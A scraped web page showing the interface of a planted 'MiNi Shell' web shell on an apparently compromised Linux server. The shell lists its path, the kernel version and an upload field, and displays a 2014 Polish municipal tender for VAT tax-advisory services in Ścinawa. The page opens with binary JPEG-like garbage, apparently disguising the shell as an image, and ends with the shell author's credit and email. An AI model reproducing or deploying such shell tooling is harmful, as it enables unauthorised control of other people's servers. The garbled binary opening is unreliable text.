JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140521/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140521/109107-N-2014.html

<p class="kh_header"><b>Ścinawa: Świadczenie usług doradztwa podatkowego w zakresie odzyskiwania podatku VAT</b><br>
<b>Numer ogłoszenia: 109107 - 2014; data zamieszczenia: 21.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Ścinawa , Rynek 17, 59-330 Ścinawa, woj. dolnośląskie, tel. 076 8412600, faks 076 8412601.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.umig-scinawa.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług doradztwa podatkowego w zakresie odzyskiwania podatku VAT.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Nazwa zadania: Świadczenie usług doradztwa podatkowego w zakresie odzyskiwania podatku VAT;
2) Przedmiotem zamówienia jest świadczenie usług doradztwa podatkowego, w tym usług doradztwa podatkowego polegających na zastępstwie procesowym i doradztwie w zakresie zastępstwa procesowego w postępowaniu o zwrot nadpłaty podatku od towarów i usług poprzedzonego kompleksowym przeglądem podatkowym podatku VAT i wskazaniem obszarów możliwej optymalizacji rozliczeń podatku VAT Gminy Ścinawa z uwzględnieniem wyroku Naczelnego Sądu Administracyjnego w Warszawie z 24 czerwca 2013 roku sygn. akt I FPS 1/13. Przewidywana kwota podatku VAT do odzyskania przez Zamawiającego to 1 500 000,00 zł.
3) Przedmiot zamówienia realizowany będzie wg. etapów tj.: fazy diagnostycznej i fazy wdrożeniowej, które realizowane będą zgodnie z nw. zakresem:
a) kompleksowy przegląd podatkowy za lata od 01-01-2010 do miesiąca, za który złożono ostatnią deklarację podatkowa włącznie (do dnia 30-06-2014),
b) weryfikacja rocznej korekty w oparciu o faktyczną proporcję sprzedaży po zakończeniu roku podatkowego w przypadku zastosowania się do rekomendacji Wykonawcy odnośnie rozliczania VAT na zasadzie struktury sprzedaży,
c) w ramach fazy diagnostycznej Wykonawca przeprowadzi kompleksowy przegląd podatkowy w zakresie podatku VAT oraz zidentyfikuje i wskaże obszary możliwej optymalizacji rozliczeń VAT dokonywanych przez Zamawiającego,
d) faza diagnostyczna nie będzie trwała dłużej niż 6 miesięcy licząc od dnia podpisania umowy,
e) faza diagnostyczna będzie obejmować kompleksowy przegląd podatkowy w zakresie podatku VAT z lat od 01.01.2010 do dnia 30.06.2014 r.,
f) przegląd podatkowy będzie obejmował w szczególności:
- badanie rozliczeń podatkowych w zakresie podatku od towarów i usług: deklaracje podatkowe, ewidencja podatkowa, dokumenty źródłowe (m.in. faktury, faktury korygujące, noty korygujące, faktury wewnętrzne, inne dokumenty mogące mieć wpływ na istnienie lub zakres obowiązku podatkowego, np. umowy),
- dokonanie analizy poszczególnych strumieni przychodów uzyskiwanych przez Zamawiającego w badanym okresie, wraz z odniesieniem tych przychodów do odpowiednich przepisów prawa oraz ustalenie, które przychody powinny być rozpoznawane jako czynności objęte zakresem opodatkowania podatkiem VAT, tj. obowiązkiem ich wykazania w deklaracji jako opodatkowanych lub zwolnionych,
- ocenę skutków przeprowadzanych transakcji w świetle podatku VAT: (m.in., właściwe przyporządkowanie stawek podatku i zastosowanych zwolnień, terminy wystawiania faktur, prawidłowość ujęcia w ewidencji faktur, faktur korygujących, nieodpłatne przekazania, darowizny, wnoszenie wkładów rzeczowych, wykonywanie innych czynności podlegających opodatkowaniu podatkiem VAT),
- szczegółową weryfikację i kalkulację kwot podatku naliczonego zapłaconego przy nabyciu towarów i usług mającą na celu ustalenie prawidłowości ujęcia/brak ujęcia tych kwot w rejestrach przygotowywanych przez Zamawiającego, 
- ustalenie potencjalnych obszarów optymalizacji podatku VAT wyłącznie w zakresie dotychczas niestosowanym przez Zamawiającego, wskazanie podstaw prawnych (interpretacji podatkowych, orzeczeń sądów), oszacowanie wartości podatku VAT do odzyskania,
- zbadanie możliwości wprowadzenia proporcjonalnego odliczenia podatku VAT i wskazanie rozwiązań w tym zakresie,
- oszacowanie ryzyka zakwestionowania przez organy podatkowe zaprezentowanych rozwiązań optymalizacyjnych oraz wskazanie prawdopodobieństwa sukcesu,
- inne czynności związane z realizacją przedmiotu umowy,
g) Zamawiający nie ustali progu istotności, poniżej którego dokumenty nie byłyby weryfikowane.
h) faza diagnostyczna zostanie zakończona przedstawieniem Zamawiającemu pisemnego raportu (zwanego dalej Raportem), który będzie zawierał ocenę istniejącego stanu rozliczeń VAT oraz rekomendacje Wykonawcy. Stopień szczegółowości udzielonych rekomendacji powinien umożliwić Zamawiającemu podjęcie decyzji o ewentualnym wdrożeniu całości lub części rozwiązań zaproponowanych przez Wykonawcę, bądź o zawieszeniu lub rezygnacji z realizacji fazy wdrożeniowej. Raport zostanie przedstawiony Zamawiającemu nie później, niż w terminie w skazanym w § 3 ust. 3. umowy,
i) Raport będzie zawierał m.in.:
- propozycje zmian w zakresie rozliczeń podatku VAT przez Zamawiającego,	
- praktyczne sposoby wprowadzenia zmian, o których mowa powyżej,
- prezentację możliwych obszarów optymalizacji rozliczeń VAT dokonywanych przez Zamawiającego,	
- wstępne oszacowanie możliwej do odzyskania przez Zamawiającego kwoty VAT,
- oszacowanie prawdopodobieństwa skutecznej implementacji proponowanych rozwiązań optymalizacyjnych,
- oszacowanie, zgodnie z najlepszą wiedzą i doświadczeniem zawodowym Wykonawcy, poziomu ryzyka zakwestionowania przez organy podatkowe zaprezentowanych rozwiązań optymalizacyjnych,
- rekomendacje oraz wskazanie praktycznych działań zmierzających do implementacji rozwiązań optymalizacyjnych,
- rekomendacje oraz wskazanie praktycznych działań zmierzających do zminimalizowania ryzyka zakwestionowania przez organy podatkowe zaprezentowanych i zaimplementowanych zakresów rozwiązań optymalizacyjnych,				
j) Zamawiający może żądać uzupełnienia, a także rozszerzenia treści Raportu (jego elementów), jeżeli uzna, że takie rozszerzenie będzie konieczne dla podjęcia decyzji, o której mowa w § 4 ust. 1. umowy Wykonawca zobowiązany jest do uzupełnienia lub rozszerzenia treści raportu zgodnie z wnioskiem Zamawiającego w terminie 14 dni od daty otrzymania zgłoszenia. Żądanie wskazane w zdaniu 1 Zamawiający może skierować do Wykonawcy w terminie 30 dni licząc od dnia przekazania raportu.
k) wdrożenie zidentyfikowanych możliwości rozwiązań optymalizacyjnych w ramach fazy wdrożeniowej jest każdorazowo uzależnione od akceptacji Zamawiającego. W szczególności, Zamawiający może podjąć decyzję o:
- pełnej akceptacji rekomendacji Wykonawcy przedstawionych w raporcie,
- akceptacji jedynie wybranych rekomendacji Wykonawcy przedstawionych w raporcie,
- zawieszeniu realizacji fazy wdrożeniowej na czas określony,
- rezygnacji z realizacji fazy wdrożeniowej,
l) po dokonaniu akceptacji przez Gminę Ścinawa rozwiązań optymalizacyjnych Wykonawca podejmie działania zmierzające do zrealizowania oszczędności we wskazanych obszarach rozliczeń VAT,
m) Zamawiający powiadomi Wykonawcę o decyzji, o której mowa w ust. 1 powyżej w formie pisemnej,
n) w ramach fazy wdrożeniowej harmonogram prac będzie każdorazowo ustalany oddzielnie dla poszczególnych obszarów optymalizacji pomiędzy Zamawiającym, a Wykonawcą z uwzględnieniem poniższych zasad:
- przygotowanie przez Wykonawcę wniosku o indywidualną interpretację podatkową musi nastąpić w terminie do 3 tygodni od poinformowania Wykonawcy o podjęciu decyzji przez Zamawiającego o realizacji danego obszaru optymalizacji,
- dokumenty dla których złożenia są przewidziane przepisami prawa terminy Wykonawca zobowiązany jest do złożenia z zachowaniem tych terminów działając w ramach udzielonego pełnomocnictwa,
- wszelkie inne czynności do których zobowiązany będzie Wykonawca należy wykonać w terminie do 3 miesięcy od dnia poinformowania przez Zamawiającego o realizacji danego obszaru optymalizacji,
o) jeżeli Zamawiający zdecyduje się na wdrożenie całości lub części rekomendacji Wykonawcy przedstawionych w Raporcie, działania związane z realizacją przez Wykonawcę fazy wdrożeniowej będą obejmować w szczególności:
- przygotowanie korekt przeszłych rozliczeń VAT, przygotowanie wyjaśnień do korekt deklaracji, wniosków o stwierdzenie nadpłaty oraz udział w przygotowaniu i weryfikacja przygotowanych bieżących i przyszłych rozliczeń VAT, w związku z przeprowadzaną optymalizacją,
- przygotowanie wniosków o wydanie indywidualnych interpretacji podatkowych,
- przygotowanie środków odwoławczych do organów oraz sądów administracyjnych w przypadku otrzymania niekorzystnych indywidualnych interpretacji podatkowych,
- reprezentowanie Zamawiającego w postępowaniach podatkowych przed organami podatkowymi i sądami administracyjnymi oraz innymi sądami, trybunałami i organami w zakresie jaki okaże się niezbędny dla realizacji przedmiotu umowy oraz przygotowywanie wszelkich niezbędnych pism, wniosków, środków odwoławczych w tym zakresie,
- udział w trakcie kontroli podatkowych, przygotowanie uwag do protokołów przy kontrolach podatkowych wynikających z przeprowadzanego procesu optymalizacji podatku VAT,
- w przypadku akceptacji rekomendacji w zakresie ustalenia współczynnika proporcji ustalenie prawidłowego współczynnika proporcji w zakresie odliczania podatku VAT oraz przygotowanie dokumentacji stanowiącej podstawę do wdrożenia współczynnika proporcji w zakresie odliczania podatku VAT. Weryfikacja rocznej korekty w oparciu o faktyczną proporcję sprzedaży po zakończeniu roku podatkowego w przypadku zastosowania się do rekomendacji Wykonawcy odnośnie rozliczania VAT na zasadzie struktury sprzedaży,
- bieżące doradztwo oraz pomoc we wszystkich sprawach związanych z optymalizacją podatku VAT,
- inne czynności związane z realizacją przedmiotu umowy,
p) Wykonawca zobowiązany jest do niezwłocznego przekazywania Zamawiającemu kopii wszelkiej korespondencji Wykonawcy w związku z realizacją niniejszej umowy kierowanej do innych podmiotów, aniżeli Zamawiający,
q) jeżeli uzyskane przez Zamawiającego kwoty podatku VAT wynikające z zastosowania się do rekomendacji Wykonawcy zgodnie z niniejszą umową zostaną w przyszłości kwestionowane przez organy podatkowe, Wykonawca zobowiązany będzie do reprezentowania Zamawiającego w toczących się postępowaniach podatkowych, przez cały okres, w którym organy podatkowe mogą zakwestionować wdrożone rozwiązania optymalizacyjne tj. aż do momentu przedawnienia oraz do realizacji wszelkich czynności zgodnie z umową wynikających z tych postępowań,
r) Zamawiający zobowiązany jest do współdziałania z Wykonawcą polegającego na zapewnieniu dostępu do dokumentów wymaganych przez Wykonawcę,
s) Wykonawca zobowiązany jest do przekazywania do Referatu Finansów i Budżetu Urzędu Miasta i Gminy w Ścinawie wezwania do uiszczenia opłaty sądowej/urzędowej, wpisów w związku z prowadzonymi na rzecz Zamawiającego sprawami, jeśli kwota płatności jest wyższa niż 5.000,00 zł., nie później niż 14 dni roboczych przed upływem terminu zapłaty,
t) Wykonawca zobowiązany jest do uiszczania opłaty sądowej/urzędowej, wpisów w związku z prowadzonymi na rzecz Zamawiającego sprawami jeżeli kwota płatności jest niższa niż lub równa 5.000,00 zł. lub niezależnie od wysokości opłaty jeśli termin zapłaty jest krótszy niż 14 dni roboczych,
u) Zamawiający zobowiązany jest do zwrotu Wykonawcy poniesionych przez niego kosztów opłat sądowych/urzędowych, wpisów w związku z prowadzonymi sprawami na rzecz Zamawiającego -zwrot kosztów będzie dokonywany w terminie do 21 dni od daty dostarczenia kompletnych i prawidłowo sporządzonych dokumentów potwierdzających poniesione koszty do Referatu Finansów i Budżetu Urzędu Miasta i Gminy w Ścinawie,
v) po zidentyfikowaniu obszarów możliwej optymalizacji podatku VAT zamawiający może podjąć decyzje o:
- pełnej akceptacji zaproponowanych rozwiązań optymalizacyjnych,
- akceptacji jedynie wybranych rozwiązań optymalizacyjnych,
- zawieszeniu realizacji fazy wdrożeniowej na czas określony,
- całkowitej rezygnacji z fazy wdrożeniowej..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy PZP - do 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.22.10.00-9, 79.22.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców ww.warunku na podstawie załączonego do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeśli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał usługi, a w przypadku świadczeń okresowych lub ciągłych również wykonuje te usługi odpowiadające swoim rodzajem przedmiotowi zamówienia, z podaniem ich wartości, daty wykonania i odbiorców tj.: minimum jedną usługę polegającą na przeprowadzeniu optymalizacji podatku VAT poprzedzonej przeglądem podatkowym, które zakończyło się sukcesem w zakresie odzyskania podatku VAT o wartości min. 250 000,00 zł. brutto z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców ww.warunku na podstawie załączonego do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeśli Wykonawca dysponuje osobami zdolnymi do realizacji zamówienia, tzn.: zespołem składającym się z co najmniej:
- 2 osób uprawnionych do zawodowego wykonywania usług doradztwa podatkowego zgodnie z przepisani ustawy z dnia 5 lipca 1996 r.o doradztwie podatkowym (t.j. Dz. U. z 2011 r., Nr 41 poz. 213 ze zm.), z min 3 letnim doświadczeniem w zakresie doradztwa podatkowego,
- 1 radcy prawnego, z min. 3 letnim doświadczeniem w zakresie doradztwa podatkowego.
Zamawiający dokona oceny spełnienia ww. warunku na podstawie załączonego do oferty wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców ww.warunku na podstawie załączonego do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo: - W przypadku podpisywania oferty przez osoby niewymienione w odpisie z właściwego rejestru - pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy, - W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy Pzp).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) przedłużenia terminu realizacji umowy do czasu ostatecznego rozstrzygnięcia ewentualnych spraw toczących się przed organami podatkowymi i sądami administracyjnymi oraz innymi sądami, trybunałami i organami oraz czasu realizacji przez Wykonawcę wszelkich czynności zgodnie z umową wynikających z tych rozstrzygnięć,
b) zmiany podwykonawców: w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu usług wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawcą w terminie 14 dni od przekazania umowy przez Wykonawcę,
e) zmiany ustawowej wysokości podatku VAT w przypadku gdy w trakcie realizacji przedmiotu Umowy nastąpi zmiana stawki podatku VAT dla usług objętych przedmiotem Umowy, Strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za usługi, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.umig-scinawa.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego, ul. Rynek 17, 59-330 Ścinawa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2014 godzina 13:00, miejsce: siedziba Zamawiającego, ul. Rynek 17, 59-330 Ścinawa - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com